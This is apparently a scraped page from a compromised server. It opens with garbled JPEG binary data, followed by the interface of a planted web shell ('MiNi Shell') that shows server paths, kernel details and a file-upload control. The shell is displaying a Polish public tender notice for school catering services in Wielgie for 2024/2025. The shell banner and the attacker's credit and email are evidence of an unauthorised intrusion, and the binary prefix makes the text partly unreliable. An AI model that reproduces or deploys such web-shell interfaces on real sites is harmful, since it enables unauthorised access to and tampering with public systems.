JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240702/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240702/0039156401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ,,Przygotowanie i dostarczenie posiłków dla wychowanków Specjalnego Ośrodka Szkolno-Wychowawczego w Wielgiem w roku szkolnym 2024/2025&#39;&#39; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Specjalny Ośrodek Szkolno-Wychowawczy w Wielgiem</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001010147</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">80A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wielgie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-645</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">0542801908</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sosw@golub-dobrzyn.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">sosw-wielgie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ,,Przygotowanie i dostarczenie posiłków dla wychowanków Specjalnego Ośrodka Szkolno-Wychowawczego w Wielgiem w roku szkolnym 2024/2025&#39;&#39; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3dda0cf7-37a0-11ef-880f-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00391564</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-02</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00237362/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Usługa cateringowa polegająca na przygotowaniu i dostarczeniu posiłków dla wychowanków Specjalnego Ośrodka Szkolno-Wychowawczego w Wielgiem</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/sp_golub_dobrzyn <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/sp_golub_dobrzyn</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana <br/> informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym <br/> a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się przy <br/> użyciu środków komunikacji elektronicznej, o których mowa w ustawie z dnia 18 lipca <br/> 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. 2020 r. poz. 344 z późn. zm.).<br/> 2. W postępowaniu o udzielenie zamówienia o wartości mniejszej niż progi unijne ofertę, <br/> oświadczenie, o którym mowa w art. 125 ust. 1, składa się, pod rygorem nieważności, <br/> w formie elektronicznej lub w postaci elektronicznej opatrzonej kwalifikowanym podpisem <br/> elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym.<br/> 3. Komunikacja w postępowaniu odbywa się za pośrednictwem Platformy zakupowej pod<br/> adresem : https://platformazakupowa.pl/sp_golub_dobrzyn<br/> 4. W przypadku awarii platformy, Zamawiający może również kontaktować się z Wykonawcami<br/> za pośrednictwem poczty elektronicznej – email: bruminska@golub-dobrzyn.com.pl <br/> 5.Regulamin korzystania z Platformy Zakupowej znajduje się pod adresem: <br/> https://platformazakupowa.pl/strona/1-regulamin<br/> 6. Zamawiający informuje, że instrukcje korzystania z Platformy Zakupowej dotyczące <br/> w szczególności logowania, pobierania dokumentacji, składania wniosków o wyjaśnienie <br/> treści SWZ, składania ofert oraz innych czynności, podejmowanych w niniejszym <br/> postepowaniu przy użyciu Platformy Zakupowej znajdują się w zakładce „Instrukcje dla <br/> Wykonawców” na stronie : http://platformazakupowa.pl/strona/45-instrukcje<br/> 7. Minimalne wymagania techniczne umożliwiające korzystanie ze Strony <br/> platformazakupowa.pl to przeglądarka internetowa Internet Explorer, Chrome i FireFox<br/> w najnowszej dostępnej wersji, z włączoną obsługą języka Javascript, akceptująca pliki typu <br/> „cookies” oraz łącze internetowe o przepustowości co najmniej 256 kbit/s. <br/> platformazakupowa.pl jest zoptymalizowana dla mniejszej rozdzielczości ekranu 1024x768 <br/> pikseli.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679<br/> z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem <br/> danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia<br/> dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z <br/> 04.05.2016, str. 1 z późn. zm.), dalej „RODO” Zamawiający informuje, że: <br/>1.	Administratorem danych jest Specjalny Ośrodek Szkolno-Wychowawczy w Wielgiem reprezento-wanym przez dyrektora z siedzibą w Wielgiem 80a, 87-645 Zbójno, tel. 54 280 19 08, adres e-mail: sosw@golub-dobrzyn.com.pl.<br/>2. Pani/Pana dane będą przetwarzane na podstawie art. 6 ust. 1 lit. c RODO w celu związanym <br/> z postępowaniem o udzielenie zamówienia publicznego, pn.,,Przygotowanie i dostarczenie <br/> posiłków dla wychowanków Specjalnego Ośrodka Szkolno-Wychowawczego w Wielgiem w roku <br/> szkolnym 2024/2025.’’ <br/>3.Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty , którym udostępniona zostanie<br/> dokumentacja postępowania w oparciu o Ustawę z dnia 11 września 2019 roku Prawo Zamówień <br/> Publicznych (Dz. Ust.2023.poiz 1605 ze zm).<br/>4. Pani/Pana dane osobowe będą przechowywane , zgodnie z art. 97 ust. Ustawy Pzp, przez okres 4 lat <br/> od dnia zakończenia postępowania o udzielenie zamówienia, jeżeli czas trwania umowy przekracza<br/> 4 lata ,okres przechowywania obejmuje cały czas trwania umowy.<br/>5. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio dotyczących Państwa jest <br/> wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postepowaniu <br/> o udzielenie zamówienia publicznego ;konsekwencje niepodania określonych danych wynikają <br/> z ustawy Pzp.<br/>6. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób <br/> zautomatyzowany, stosownie do art.22 RODO.<br/>7. Posiada Pani/Pan na podstawie:<br/> -art.15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/> -art. 16 RODO o prawo do sprostowania Pani/Pana danych osobowych1;<br/> -art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z <br/> za strzeżeniem przypadków, o których mowa w art. 18 ust.2 RODO2;<br/> -prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, ul. Stawki 2, 00-193 <br/> Warszawa, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza <br/> przepisy RODO;<br/> 8.Nie przysługuję Pani/Panu:<br/> - w związku z art. 17 ust.3lit.b,d lub e RODO prawo do usunięcia danych osobowych;<br/> -prawo do przenoszenia danych osobowych, o którym mowa w art.20 RODO;<br/> -na podstawie art.21 RODO prawo sprzeciwu ,wobec przetwarzania danych osobowych, gdyż <br/> podstawą prawną przetwarzania Pani/Pana danych osobowych jest art.6 ust.1 lit.c RODO.<br/>9. Kontakt z inspektorem Powiatu Golubsko-Dobrzyńskiego jest możliwy poprzez adres e-mail:<br/> iod.powiat@golub-dobrzyn.com.pl lub pocztą tradycyjną: Inspektor Danych Osobowych Starostwa<br/> Powiatowego w Golubiu-Dobrzyniu, ul. Plac 1000-lecia 25, 87-400 Golub-Dobrzyń.<br/>10. Państwa dane od momentu pozyskania będą przechowywane przez okres wynikający z regulacji <br/> prawnych- kategorii archiwalnej dokumentacji, określonej w jednolitym rzeczowym wykazie akt dla <br/> naszej placówki. Państwa dane nie będą przetwarzane w sposób automatyczny.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SOSW.272.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 152000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest wykonywanie usługi przygotowywania oraz dostarczania posiłków do Specjalnego Ośrodka Szkolno-Wychowawczego w Wielgiem w roku szkolnym 2024/2025 .<br/>2. Żywienie realizowane będzie w dniach nauki szkolnej w okresie od 02 września 2024r. do <br/> 27 czerwca 2025r.<br/>3. Wykonawca będzie przygotowywał i dostarczał posiłki w godzinach uzgodnionych <br/> z Zamawiającym odpowiednio do organizacji pracy placówki na podstawie obecności <br/> wychowanków w internacie . Planowane ilości dostaw mają charakter szacunkowy,<br/> w zależności od frekwencji dzieci w szkole. Podane przez Zamawiającego minimalne ilości <br/> posiłków nie ulegną zmianie ( zmniejszeniu). <br/>4. Posiłki muszą być przygotowywane zgodnie z zasadami określonymi w ustawie z dnia 25 <br/> sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (Dz.U. z 2023 r.poz 1448) oraz <br/> zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 26 lipca 2016 r. w sprawie grup środków <br/> spożywczych przeznaczonych do sprzedaży dzieciom i młodzieży w jednostkach systemu <br/> oświaty oraz wymagań, jakie muszą spełniać środki spożywcze stosowane w ramach żywienia <br/> zbiorowego dzieci i młodzieży w tych jednostkach (Dz.U. z 2016 r. poz. 1154). <br/>5. Szczegółowy opis przedmiotu zamówienia stanowi Zał. Nr 1 do SWZ. <br/>6. Wykonawca zobowiązany jest zrealizować zamówienie na zasadach i warunkach opisanych <br/> we wzorze umowy stanowiącym Zał. Nr 5 do SWZ. <br/><br/>7. Wspólny Słownik Zamówień CPV: <br/> 55321000-6 Usługi przygotowywania posiłków <br/> 55520000-1 Usługi dostarczania posiłków <br/>8. Zamawiający nie dokonuje podziału zamówienia na części, tym samym Zamawiający nie<br/> dopuszcza składania ofert częściowych, podział zamówienia groziłby nadmiernymi <br/> trudnościami organizacyjnymi/technicznymi i nadmiernymi kosztami wykonania zamówienia, <br/> co mogłoby poważnie zagrozić właściwemu wykonaniu przedmiotu zamówienia. <br/> Przedmiot zamówienia stanowi niepodzielną całość i wskazane jest, aby wykonywał go jeden <br/> Wykonawca. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">55321000-6 - Usługi przygotowywania posiłków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">55520000-1 - Usługi dostarczania posiłków</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-02 do 2025-06-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w <br/> kryteriach: <br/>a) „Cena ofertowa brutto” – C; <br/>b)	„Termin płatności faktury” – T. <br/> <br/>C – punkty uzyskane w kryterium „Cena ofertowa brutto”, <br/>T – punkty uzyskane w kryterium „Termin płatności faktury”, <br/> Ocena punktowa w kryterium „Cena ofertowa brutto” dokonana zostanie na podstawie ceny ofertowej brutto wykonywania usługi objętej zamówieniem wskazanej przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli w rozdz. XVII SWZ. <br/> Ocena punktowa w kryterium „Termin płatności faktury” dokonana zostanie na podstawie terminu płatności faktury wskazanego przez Wykonawcę w ofercie i przeliczona według wzoru opisanego w tabeli w rozdz. XVII SWZ<br/> Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyłoni najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający , na podstawie art.112 ustawy Pzp określa warunki udziału w <br/> postępowaniu dotyczące: <br/>1.	kompetencji lub uprawnień do prowadzenia określonej działalności gospodarczej i zawodowej, o ile wynika to z odrębnych przepisów. Zamawiający nie określa tego warunku dla postępowania. Zamawiający wymaga złożenia przez Wykonawcę oświadczenia o spełnieniu warunków udziału w postępowaniu –zał. nr 3 do SWZ ;<br/>2. sytuacji ekonomiczno-finansowej<br/> Zamawiający nie określa tego warunku dla postępowania. Wykonawca złoży oświadczenie <br/> o spełnieniu warunków udziału w postępowaniu –zał. nr 3 do SWZ ;<br/>3. zdolności technicznej /zawodowej<br/> Zamawiający nie określa tego warunku dla postępowania. Wykonawca złoży <br/> oświadczenie o spełnieniu warunków udziału w postępowaniu –zał. nr 3 do SWZ . <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Wykonawca dołącza do formularza ofertowego oświadczenia:<br/> - o spełnieniu warunków udziału w postępowaniu w zakresie wskazanym w <br/> załączniku nr 3 do SWZ<br/>- o niepodleganiu wykluczeniu z udziału w postępowaniu w zakresie wskazanym w<br/> załączniku nr 4 do SWZ. <br/>2. W zakresie nieuregulowanym SWZ, zastosowanie mają przepisy rozporządzenia <br/> Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków <br/> dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od <br/> wykonawcy (Dz.U. z 2023 r. poz.1824).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.	Wykonawca dołącza do formularza ofertowego oświadczenia:<br/> - o spełnieniu warunków udziału w postępowaniu w zakresie wskazanym w <br/> załączniku nr 3 do SWZ<br/>- o niepodleganiu wykluczeniu z udziału w postępowaniu w zakresie wskazanym w<br/> załączniku nr 4 do SWZ. <br/>2. W zakresie nieuregulowanym SWZ, zastosowanie mają przepisy rozporządzenia <br/> Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków <br/> dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od <br/> wykonawcy (Dz.U. z 2023 r. poz.1824).</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w przypadku zmian obowiązujących przepisów, dotyczącą zmiany stawki VAT. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-16 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-16 11:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com